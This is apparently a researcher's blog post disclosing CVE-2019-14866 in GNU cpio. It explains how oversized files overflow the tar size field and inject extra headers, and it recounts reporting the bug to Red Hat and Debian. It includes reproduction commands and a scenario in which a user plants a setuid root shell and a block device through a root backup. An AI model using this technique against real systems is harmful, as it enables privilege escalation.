I found a security bug in GNU cpio and thought I’d write down the story of that. It’s not the most interesting bug in the world, but it may still be an interesting story to some.

An odd limit

The whole thing started with me looking at the manpage

-H, --format=FORMAT
  Use given archive FORMAT. Valid formats are (the number in
  parentheses gives maximum size for individual archive member):
  bin    The obsolete binary format. (2147483647 bytes)
  odc    The old (POSIX.1) portable format. (8589934591 bytes)
  newc   The new (SVR4) portable format, which supports file
         systems having more than 65536 i-nodes. (4294967295 bytes)
  crc    The new (SVR4) portable format with a checksum added.
  tar    The old tar format. (8589934591 bytes)
  ustar  The POSIX.1 tar format. Also recognizes GNU tar archives, which are
         similar but not identical. (8589934591 bytes)
  hpbin  The obsolete binary format used by HPUX's cpio (which stores device
         files differently).
  hpodc  The portable format used by HPUX's cpio (which stores device files

What’s wrong with this picture? Those are some very odd size limits. 2GiB and 4GiB I understand, as it’s 32bit signed and unsigned int. But tar having a max size of 8GiB? 33 bits? That doesn’t make any sense.

I was lucky finding this because some versions of the manpage doesn’t have this info. E.g. this and this.

Turns out the tar header format stores file size in 12 bytes, as a stringin octal! There are variants and extensions, but long story short that’s the common limit.

That’s… terrible. But it’s a format from the stone age, so maybe can be forgiven.

I wonder what happens if you exceed that limit… oh… oh no

$ dd if=/dev/zero seek=16G bs=1 count=0 of=testfile.dat
$ echo testfile.dat | cpio -H tar -o | tar tf -
-rw-r--r-- 1000/1000         0 2019-11-07 13:04 testfile.dat
                          ^^^^\--- That's the size according to tar.
$ echo testfile.dat | cpio -H tar -o | wc -c
                          ^^^^^^^^^^^\-- That's the total size of the tar file file.

oh no. The tar format is a series of “hey, here comes a file named X, that’s Y bytes long, after those Y bytes I’ll tell you about the next file”.

I’ve generated a tar file that says “hey, here comes a file named testfile.dat that’s 0 bytes long. After those 0 bytes comes another file header.”

This means I can make cpio read data (contents of file it reads), and write it as if it’s metadata (a tar header):

$ tar cf suffix.tar AUTHORS                            # Create some payload.
$ dd if=/dev/zero seek=16G bs=1 count=0 of=suffix.tar  # Pad it to "look like" 0 bytes.
$ echo suffix.tar | cpio -H tar -o | tar tvf -         # Feed it to cpio.
    -rw-r--r-- 1000/1000       0 2019-08-30 16:40 suffix.tar
    -rw-r--r-- thomas/thomas 161 2019-08-30 16:40 AUTHORS

The point here is that cpio was fed one file (suffix.tar) to put into the tar file, but it put two files in there. cpio never read AUTHORS, and it should not be listed.

But so what?

The above is obviously wrong, but how is it a security issue?

It’s a security issue because it’s not just the contents of the injected files that can have arbitrary content, but also the type of file, owner, and suid bits.

I could prepare a payload tar file that contains a suid root shell, and a /dev/sda block device.

evil$ # 1) Prep payload
evil$ ./generate_evil_data --out /home/evil/foo.tar

root# # 2) root user performs backup
root# find /home -print0 | cpio -0 -H tar -o > /var/backup/h.tar

root# # 3) root user restores
root# cd /
root# tar xf /var/backup/h.tar /home/evil/

evil$ # 4) evil user uses newly created rootshell, or writes to /dev/sda
evil$ ls -l /home/evil/
srwxr-xr-x 1 evil evil 61176 Aug  3  2018 /home/evil/rootshell
brw-rw---- 1 evil evil  8, 0 Oct  7 11:21 /home/evil/sda-pwned
evil$ /home/evil/rootshell
# id
uid=0(root) gid=0(root) groups=0(root)

Finding the code culprit

static void    // [no error checking]
to_oct(long value, […])
  [… write up to 11 octal ascii bytes as possible, plus NUL byte,
     not checking if `value` didn't fit …]
void           // [no error checking]
write_out_tar_header (struct cpio_file_stat *file_hdr, int out_des)
write_out_tar_header (file_hdr, out_des); /* FIXME: No error checking */
return 0;    // [0 means success]

That “FIXME” is in the original, and appears to have been there since at least 1994.

There may be millions of scripts out there using cpio that are vulnerable.

The tar format is largely to blame here. It’s a “packet in packet” attack which could have been prevented if tar, like many many other formats and protocols, used a regular language (also see this talk).

Well the tar format and a code bug from like 1994.

So is this only GNU, or more implementations?

OpenBSD, as usual, is fine. I’ve not checked other implementations. But it sure is pushing me from Linux to OpenBSD.


I reported to the bug-cpio mailing list, being a bit vague describing it only as “hey, that’s surprising output”, hoping to get the patch in early.

10 days with no reply later I emailed the Debian package maintainer and cpio owner directly. No response.

Another week later I started emailing security@debian.org and secalert@redhat.com. Redhat took 10 days to respond. Debian 13 days.

It took a bit of back and forth to explain why this was a security issue, but RedHat eventually created CVE 2019-14866.

On 2019-10-25 the cpio maintainer creates creates a separate patch for the problem. It’s multiple changes in one, which is not great, so for backporting the change to Debian old and oldold stable the Debian package maintainer chose to go with my minimal patch (with a 32bit arch fix).

  • Ubuntu (calls this expose of info, but it’s privesc).
  • Debian
  • Redhat


Oh no, I forgot to give the bug a name, logo, and website. :-(